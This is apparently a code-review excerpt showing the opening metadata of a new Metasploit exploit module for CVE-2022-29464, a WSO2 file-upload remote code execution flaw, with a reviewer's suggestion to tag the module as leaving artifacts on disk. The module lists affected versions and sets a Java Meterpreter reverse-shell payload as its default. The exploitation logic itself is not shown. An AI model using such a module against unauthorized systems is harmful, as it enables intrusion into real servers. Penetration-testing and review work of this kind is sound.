modules/exploits/multi/http/wso2_file_upload_rce.rb

```diff
@@ -0,0 +1,135 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Payload::Java
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WSO2 Arbitrary File Upload to RCE',
+        'Description' => %q{
+          This module abuses a vulnerability in certain WSO2 products that allow unrestricted file
+          upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and
+          above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server
+          Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above
+          through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0.
+        },
+        'Author' => [
+          'Jack Heysel <jack_heysel[at]rapid7.com>' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'CVE', '2022-29464'],
+          [ 'URL', 'https://github.com/hakivvi/CVE-2022-29464' ],
+          [ 'URL', 'https://twitter.com/wvuuuuuuuuuuuuu/status/1517433974003576833' ]
+        ],
+        'DefaultOptions' => {
+          'Payload' => 'java/meterpreter/reverse_tcp',
+          'SSL' => true
+        },
+        'Privileged' => false,
+
+        'Targets' => [
+          [
+            'Java Dropper',
+            {
+              'Platform' => 'java',
+              'Arch' => ARCH_JAVA,
+              'Type' => :java_dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'java/meterpreter/reverse_tcp',
+                'WfsDelay' => 10
+              }
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2022-04-01',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
```

Comment:
`ARTIFACTS_ON_DISK` is likely relevant too, as the module drops a war to disk.

```suggestion
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
```